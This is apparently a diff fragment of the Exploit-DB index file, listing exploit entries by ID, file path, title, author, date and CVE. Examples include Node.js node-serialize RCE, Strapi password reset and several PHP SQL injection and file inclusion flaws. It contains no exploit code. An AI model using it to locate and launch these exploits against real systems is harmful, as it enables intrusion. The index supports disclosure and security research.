49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,,2021-02-10,2021-02-10,0,CVE-2017-5941,,,,, 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,,2021-02-10,2021-02-10,0,CVE-2017-5941,,,,,
50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,,2021-06-18,2021-06-18,0,CVE-2017-5941,,,,, 50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,,2021-06-18,2021-06-18,0,CVE-2017-5941,,,,,
51867,exploits/nodejs/webapps/51867.txt,"Numbas < v7.3 - Remote Code Execution",2024-03-10,"Matheus Alexandre",webapps,nodejs,,2024-03-10,2024-03-10,0,CVE-2024-27612,,,,,
50716,exploits/nodejs/webapps/50716.rb,"Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",2022-02-08,WackyH4cker,webapps,nodejs,,2022-02-08,2022-02-08,0,CVE-2019-18818,,,,, 50716,exploits/nodejs/webapps/50716.rb,"Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",2022-02-08,WackyH4cker,webapps,nodejs,,2022-02-08,2022-02-08,0,CVE-2019-18818,,,,,
13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",dos,novell,139,2010-06-16,,1,CVE-2010-2351;OSVDB-65625,,,,, 13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",dos,novell,139,2010-06-16,,1,CVE-2010-2351;OSVDB-65625,,,,,
19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",dos,novell,,2000-02-04,2012-07-11,1,CVE-2000-0152;OSVDB-7468,,,,,https://www.securityfocus.com/bid/976/info 19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",dos,novell,,2000-02-04,2012-07-11,1,CVE-2000-0152;OSVDB-7468,,,,,https://www.securityfocus.com/bid/976/info
@ -13799,6 +13802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,, 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,,
7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,, 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,,
2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,, 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,,
51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,,
21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz, 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz,
18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,, 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,,
10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,webapps,php,,2010-01-01,,1,,,,,, 10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,webapps,php,,2010-01-01,,1,,,,,,
@ -16719,6 +16723,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comdata_center_audit_v262.zip, 45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comdata_center_audit_v262.zip, 45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,webapps,php,,2010-10-14,2010-10-14,1,,,,,http://www.exploit-db.comUploadManagemnt23205.zip, 15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,webapps,php,,2010-10-14,2010-10-14,1,,,,,http://www.exploit-db.comUploadManagemnt23205.zip,
51868,exploits/php/webapps/51868.txt,"DataCube3 v1.0 - Unrestricted file upload 'RCE'",2024-03-10,"Samy Younsi - NS Labs",webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-25832;CVE-2024-25830,,,,,
17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php,,2011-06-07,2011-06-07,1,,,,,, 17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php,,2011-06-07,2011-06-07,1,,,,,,
34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,webapps,php,,2010-08-06,2014-08-26,1,,,,,,https://www.securityfocus.com/bid/42282/info 34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,webapps,php,,2010-08-06,2014-08-26,1,,,,,,https://www.securityfocus.com/bid/42282/info
32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php,,2008-08-12,2014-03-13,1,CVE-2008-4439;OSVDB-48829,,,,,https://www.securityfocus.com/bid/30659/info 32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php,,2008-08-12,2014-03-13,1,CVE-2008-4439;OSVDB-48829,,,,,https://www.securityfocus.com/bid/30659/info
@ -19524,6 +19529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,,2021-03-18,2021-03-18,0,,,,,, 49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,,2021-03-18,2021-03-18,0,,,,,,
34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-06-01,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40509/info 34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-06-01,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40509/info
12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-05-31,,0,,,,,http://www.exploit-db.comHexjector_v1.0.7.2.zip, 12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-05-31,,0,,,,,http://www.exploit-db.comHexjector_v1.0.7.2.zip,
51871,exploits/php/webapps/51871.txt,"Hide My WP < 6.2.9 - Unauthenticated SQLi",2024-03-10,"Xenofon Vassilakopoulos",webapps,php,,2024-03-10,2024-03-10,0,CVE-2022-4681,,,,,
41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,, 41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,,
5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",webapps,php,,2008-06-29,2016-12-14,1,OSVDB-46636;CVE-2008-3127,,,,http://www.exploit-db.comHBR_1_3.zip, 5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",webapps,php,,2008-06-29,2016-12-14,1,OSVDB-46636;CVE-2008-3127,,,,http://www.exploit-db.comHBR_1_3.zip,
6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php,,2008-07-29,2016-12-21,1,,,,,http://www.exploit-db.comHBS_2_0.zip, 6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php,,2008-07-29,2016-12-21,1,,,,,http://www.exploit-db.comHBS_2_0.zip,
